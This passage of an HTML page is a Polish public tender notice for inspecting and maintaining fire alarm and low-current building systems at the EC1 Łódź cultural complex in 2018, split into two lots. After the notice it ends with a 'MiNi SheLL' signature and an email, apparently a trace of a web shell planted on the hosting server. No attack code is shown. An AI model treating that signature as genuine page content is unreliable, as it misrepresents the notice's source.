id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Miejsce i termin otwarcia ofert: 1) miejsce otwarcia ofert: siedziba Zamawiającego: ,,EC1 Łódź - Miasto Kultury" w Łodzi, ul. Targowa 1/3, 90-022 Łódź, Sala konferencyjna.2) termin otwarcia ofert: dnia 24 lipca 2018 r. do godziny 12:10.Zabezpieczenie należytego wykonania umowy:Od Wykonawcy, którego oferta została wybrana jako najkorzystniejsza i który zostanie zaproszony do podpisania umowy, wymagane będzie wniesienie zabezpieczenia należytego wykonania umowy, w wysokości 5% ceny oferty zawierającej podatek. Zabezpieczenie może być wniesione wyłącznie w formach określonych w art. 148 ust. 1 ustawy Pzp. Zamawiający nie przewiduje wniesienia zabezpieczenia w innych formach określonych w art. 148 ust. 2 ustawy Pzp.Zabezpieczenie musi być wniesione przed podpisaniem umowy.W celu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca, którego ofertę wybrano, jako najkorzystniejszą przed podpisaniem umowy:1)	przedkłada umowę regulującą współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta tych Wykonawców zostanie wybrana, która powinna określać co najmniej strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania każdemu z nich, solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia;2)	wnosi zabezpieczenie należytego wykonania umowy na warunkach i w formie określonych w Rozdziale XVI niniejszej SIWZ. W przypadku wniesienia zabezpieczenia w formie innej niż pieniądz Wykonawca zaleca się przedstawienie Zamawiającemu wzoru gwarancji lub poręczenia w celu akceptacji ich treści;3)	przedkłada zawartą na własny koszt polisę potwierdzającą zawarcie umowy ubezpieczenia w zakresie ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia w kwocie min. 500.000,00 złotych (słownie: pięćset tysięcy złotych 00/100) - dla każdego z zadań, a w przypadku złożenia oferty na obydwa zadania - w wysokości min. 1.000.000,00 zł (słownie: jeden milion złotych);4)	przedkłada dokumenty potwierdzające posiadanie kwalifikacji i uprawnień do wykonywania prac związanych z realizacją zamówienia, dla osób wskazanych w przedłożonym Wykazie osób.WIZJA LOKALNA:1)	W celu prawidłowego przygotowania oferty oraz oszacowania kosztów realizacji usługi zaleca się dokonanie wizji lokalnej.2)	Koszt wizji lokalnej ponosi Wykonawca. 3)	Prowadzenie jakichkolwiek ustaleń podczas wizji nie jest wiążące. Wszelkie merytoryczne pytania należy kierować do Zamawiającego pisemnie lub e-mailem, zgodnie z postanowieniami niniejszej SIWZ.4)	Wizja lokalna będzie mogła mieć miejsce w dni robocze - w godzinach 8:00 - 16:00 5)	O dokonanie wizji lokalnej należy zwracać się z wnioskiem, przesłanym e-mailem do Zamawiającego na adres:e-mail: a.sikorski@ec1lodz.pl, do wiadomości: zamowienia@ec1lodz.pl. We wniosku należy wskazać Wykonawcę oraz ilość osób, która będzie uczestniczyła w wizji.6)	Zamawiający wyznaczy termin wizji lokalnej informując Wykonawcę o powyższym w drodze e-mailowej.7)	W przypadku pytań zgłaszanych w trakcie wizji, Wykonawca po jej zakończeniu winien przesłać je na adres e-mail: zamowienia@ec1lodz.pl</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>ZADANIE A - ,,PRZEGLĄD INSTALACJI NISKOPRĄDOWYCH, KONSERWACJA SYSTEMU SYGNALIZACJI POŻAROWEJ WRAZ Z USUWANIEM AWARII W BUDYNKACH: EC1 WSCHÓD I DYREKCJI KOMPLEKSU ,,EC1 ŁÓDŹ - MIASTO KULTURY" W ŁODZI""</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE A Przedmiotem zamówienia jest usługa polegająca na zapewnieniu przez Wykonawcę stałej sprawności technicznej instalacji niskoprądowych i jej systemów opisanych w przedmiocie zamówienia obejmująca:Zakres podstawowy - obowiązkowy jednorazowy przegląd okresowy i wykonanie konserwacji systemów instalacji niskoprądowych opisanych w niniejszym opisie przedmiotu zamówienia. Zakres dodatkowy - sukcesywne usuwanie awarii i dokonywanie napraw w okresie obowiązywania umowy instalacji niskoprądowych na zlecenie Zamawiającego w kompleksie budynków ,,EC1 Łódź Miasto Kultury" w Łodzi przy ul. Targowej 1/3 obejmująca budynki EC1 Wschód i budynek Dyrekcji.Zamawiający przewiduje, w ramach zakresu dodatkowego (usuwanie awarii, naprawy), zlecenie maksymalnie 75 roboczo - godzin pracy w okresie trwania Umowy.Instalacje i systemy objęte zadaniem:SSP - System Sygnalizacji Pożarowej służący do wykrywania zagrożenia pożarowego, sygnalizowaniu i powiadamianiu o zagrożeniu oraz wykonywaniu funkcji sterujących realizowane przez moduły funkcyjne inicjujące elementy (pożarowe klapy odcinające, trzymacze drzwi, urządzenia sygnalizacyjne, ostrzegawcze, itp.), i systemy współdziałające (System Kontroli Dostępu, Dźwiękowy System Ostrzegania, Samodzielne Urządzenia Gaśnicze, Centrale Systemu Oddymiania, Centrale Systemu Napowietrzania, Dźwigi, Bramy i Kurtyny dymowe itp.).SNP - systemy niskoprądowe, obejmujące systemy sygnalizacji włamania i napadu, kontrolę dostępu, telewizję przemysłową, domofony, systemy telewizji kablowej, BMS -zarządzanie budynkiem.CSP - Centrala Systemu Pożarowego.SOD - System Oddymiania.DSO - Dźwiękowy System Ostrzegania.SSWiN - System Sygnalizacji Włamania i Napadu.SKD - System Kontroli Dostępu.CCTV - Closed Circuit Television (System monitoringu oparty o kamery analogowe).BMS - Building Management System (System Zarządzania Budynkiem).BMS SERWISOWY Building Management System wraz infrastrukturą (urządzeniami INPUT/OUTPUT komunikacyjnymi) służącą do odczytywania sygnałów alarmowych i sterowania urządzeniami (klimatyzacja, wentylacja).IPTV - Internet Protocol Television (System monitoringu oparty o kamery cyfrowe).DOM - instalacja domofonowa<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50710000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas reakcji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Szczegółowy Opis Przedmiotu Zamówienia, zwany dalej SOPZ, w tym częstotliwość wykonywania przeglądów i konserwacji zostały określone w Załącznikach:- A (ZADANIE A) do SIWZ.SOPZ zawiera ponadto niżej wymienione Załączniki, opisujące dodatkowo sposób realizacji zamówienia.ZADANIE AZałącznik	Nazwa Załącznika 1A	Lista obowiązkowych czynności przeglądów i konserwacji2A	Lista instalacji i wymaganych dla nich dodatkowych dokumentów upoważniających do wykonywania przeglądów i konserwacji 3A	Protokół odbioru przeglądu okresowego i konserwacji4A	Protokół zgłoszenia awarii i odbioruDodatkowo, Zamawiający udostępnia poglądowo dokumentację związaną z realizacją przedmiotu zamówienia, w tym między innymi rozmieszczenia i schematy instalacji poszczególnych systemów oraz instrukcje ich użytkowania:https://betelgeza.ec1lodz.pl/index.php/s/3KqaGA3pVr1QgnTZamawiający wymaga dla poszczególnych zadań udzielenia gwarancji w podanym niżej okresie:ZADANIE A	: minimum 12 miesięcy, okres gwarancji stanowi kryterium oceny ofert Wykonawca zobowiązany będzie posiadać przez cały okres realizacji Umowy ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej z sumą ubezpieczenia min. na sumę ubezpieczenia w kwocie min. 500.000,00 złotych (słownie: pięćset tysięcy złotych 00/100)<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>ZADANIE B - ,,PRZEGLĄD INSTALACJI NISKOPRĄDOWYCH, KONSERWACJA SYSTEMU SYGNALIZACJI POŻAROWEJ WRAZ Z USUWANIEM AWARII W BUDYNKACH: EC1 ZACHÓD KOMPLEKSU ,,EC1 ŁÓDŹ - MIASTO KULTURY" W ŁODZI""</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE BPrzedmiotem zamówienia jest usługa polegająca na zapewnieniu przez Wykonawcę stałej sprawności technicznej instalacji niskoprądowych i jej systemów opisanych w przedmiocie zamówienia poprzez:Zakres podstawowy - obowiązkowy jednorazowy przegląd okresowy i wykonanie konserwacji systemów instalacji niskoprądowych opisanych w niniejszym opisie przedmiotu zamówienia. Zakres dodatkowy - sukcesywne usuwanie awarii i dokonywanie napraw w okresie obowiązywania umowy instalacji niskoprądowych na zlecenie Zamawiającego w kompleksie budynków ,,EC1 Łódź Miasto Kultury" w Łodzi przy ul. Targowej 1/3 obejmująca budynki EC1 Zachód. Zamawiający przewiduje, w ramach zakresu dodatkowego (usuwanie awarii, naprawy), zlecenie maksymalnie 75 roboczo - godzin pracy w okresie trwania Umowy.Instalacje i systemy objęte zadaniem:SSP - System Sygnalizacji Pożarowej służący do wykrywania zagrożenia pożarowego, sygnalizowaniu i powiadamianiu o zagrożeniu oraz wykonywaniu funkcji sterujących realizowane przez moduły funkcyjne inicjujące elementy (pożarowe klapy odcinające, trzymacze drzwi, urządzenia sygnalizacyjne, ostrzegawcze itp.), i systemy współdziałające (System Kontroli Dostępu, Dźwiękowy System Ostrzegania, Samodzielne Urządzenia Gaśnicze, Centrale Systemu Oddymiania, Centrale Systemu Napowietrzania, Dźwigi, Bramy i Kurtyny dymowe, itp.).SNP - systemy niskoprądowe, obejmujące systemy sygnalizacji włamania i napadu, kontrolę dostępu, telewizję przemysłową, domofony, systemy telewizji kablowej, BMS -zarządzanie budynkiem.CSP - Centrala Systemu Pożarowego.SOD - System Oddymiania.DSO - Dźwiękowy System Ostrzegania.SSWiN - System Sygnalizacji Włamania i Napadu.SKD - System Kontroli Dostępu.DOM - instalacja domofonowaBMS - Building Management System (System Zarządzania Budynkiem).BMS SERWISOWY Building Management System wraz infrastrukturą (urządzeniami INPUT/OUTPUT komunikacyjnymi) służącą do odczytywania sygnałów alarmowych i sterowania urządzeniami (klimatyzacja, wentylacja).IPTV - Internet Protocol Television (System monitoringu oparty o kamery cyfrowe).PRZY - Instalacja przyzywowa.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50710000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas reakcji</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Szczegółowy Opis Przedmiotu Zamówienia, zwany dalej SOPZ, dla każdego z zadań, w tym częstotliwość wykonywania przeglądów i konserwacji zostały określone w Załącznikach:- B (ZADANIE B) do SIWZ.SOPZ zawiera ponadto niżej wymienione Załączniki, opisujące dodatkowo sposób realizacji zamówienia.ZADANIE BZałącznik	Nazwa Załącznika 1B	Lista obowiązkowych czynności przeglądów i konserwacji2B	Lista instalacji i wymaganych dla nich dodatkowych dokumentów upoważniających do wykonywania przeglądów i konserwacji 3B	Protokół odbioru przeglądu okresowego i konserwacji4B	Protokół zgłoszenia awarii i odbioruDodatkowo, Zamawiający udostępnia poglądowo dokumentację związaną z realizacją przedmiotu zamówienia, w tym między innymi rozmieszczenia i schematy instalacji poszczególnych systemów oraz instrukcje ich użytkowania:https://betelgeza.ec1lodz.pl/index.php/s/3KqaGA3pVr1QgnTPOLISA O ODPOWIEDZIALNOSCI CYWILNEJWykonawca zobowiązany będzie posiadać przez cały okres realizacji Umowy ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej z sumą ubezpieczenia min. na sumę ubezpieczenia w kwocie min. 500.000,00 złotych (słownie: pięćset tysięcy złotych 00/100)<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com